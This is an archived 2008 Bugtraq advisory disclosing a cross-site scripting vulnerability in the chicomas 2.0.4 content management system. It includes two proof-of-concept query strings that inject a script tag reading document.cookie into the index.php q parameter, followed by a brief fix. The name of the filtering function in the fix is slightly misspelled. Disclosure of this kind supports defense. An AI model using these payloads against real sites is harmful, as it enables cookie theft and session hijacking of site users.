lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 2 May 2008 16:36:26 -0000 From: hadikiamarsi@...mail.com To: bugtraq@...urityfocus.com Subject: chicomas.2.0.4 Author : Hadi Kiamarsi ---------------------------------------------------------------------------------- Discovered by : Hadi Kiamarsi ---------------------------------------------------------------------------------- Exploited By : Hadi Kiamarsi ---------------------------------------------------------------------------------- E-Mail : hadikiamarsi[at]hotmail.com ---------------------------------------------------------------------------------- WebSite : http://ircrash.com ---------------------------------------------------------------------------------- Our Team : ircrash ---------------------------------------------------------------------------------- IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr ---------------------------------------------------------------------------------- CMS: chicomas.2.0.4 Download CMS : http://garr.dl.sourceforge.net/sourceforge/chicomas/chicomas.2.0.4.zip ---------------------------------------------------------------------------------- Exploit : Method = POST query : http://www.example.com/[chicomas]/index.php?q=>"><script>alert(document.cookie)</script> query : http://www.example.com/[chicomas]/index.php?q="><script>alert(document.cookie)</script> ----------------------------------------------------------------------------------- Solution : you must filter special character in input via htmlspecialchar() function -----------------------------------------------------------------------------------